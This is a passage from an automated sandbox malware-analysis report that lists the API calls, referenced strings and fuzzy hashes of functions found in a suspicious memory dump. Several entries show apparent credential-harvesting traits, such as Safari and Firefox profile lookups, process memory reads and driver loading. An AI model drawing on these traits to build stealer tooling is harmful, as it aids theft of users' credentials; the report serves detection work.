                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 00409882
                                                  • wcslen.MSVCRT ref: 0040988F
                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                  • memcpy.MSVCRT ref: 004098B5
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                  • CloseClipboard.USER32 ref: 004098D7
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                  • String ID:
                                                  • API String ID: 2014503067-0
                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                  • String ID: OsError 0x%x (%u)
                                                  • API String ID: 403622227-2664311388
                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: NtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 4255912815-0
                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • memset.MSVCRT ref: 0040265F
                                                  • memcpy.MSVCRT ref: 0040269B
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • memcpy.MSVCRT ref: 004026FF
                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                  • API String ID: 577499730-1134094380
                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                  • String ID: :stringdata$ftp://$http://$https://
                                                  • API String ID: 2787044678-1921111777
                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                  • GetDC.USER32 ref: 004140E3
                                                  • wcslen.MSVCRT ref: 00414123
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                  • _snwprintf.MSVCRT ref: 00414244
                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 2080319088-3046471546
                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                  • memset.MSVCRT ref: 00413292
                                                  • memset.MSVCRT ref: 004132B4
                                                  • memset.MSVCRT ref: 004132CD
                                                  • memset.MSVCRT ref: 004132E1
                                                  • memset.MSVCRT ref: 004132FB
                                                  • memset.MSVCRT ref: 00413310
                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                  • memset.MSVCRT ref: 004133C0
                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                  • memcpy.MSVCRT ref: 004133FC
                                                  • wcscpy.MSVCRT ref: 0041341F
                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                  Strings
                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                  • {Unknown}, xrefs: 004132A6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                  • API String ID: 4111938811-1819279800
                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                  • String ID:
                                                  • API String ID: 829165378-0
                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 004041D6
                                                  • wcscpy.MSVCRT ref: 004041E7
                                                  • memset.MSVCRT ref: 00404200
                                                  • memset.MSVCRT ref: 00404215
                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                  • wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 0040426E
                                                  • memset.MSVCRT ref: 004042CD
                                                  • memset.MSVCRT ref: 004042E2
                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                  • wcscpy.MSVCRT ref: 00404311
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                  • API String ID: 2454223109-1580313836
                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                  • memcpy.MSVCRT ref: 004115C8
                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                  • API String ID: 4054529287-3175352466
                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 3143752011-1996832678
                                                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                  • API String ID: 667068680-2887671607
                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 1607361635-601624466
                                                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf$memset$wcscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 2000436516-3842416460
                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
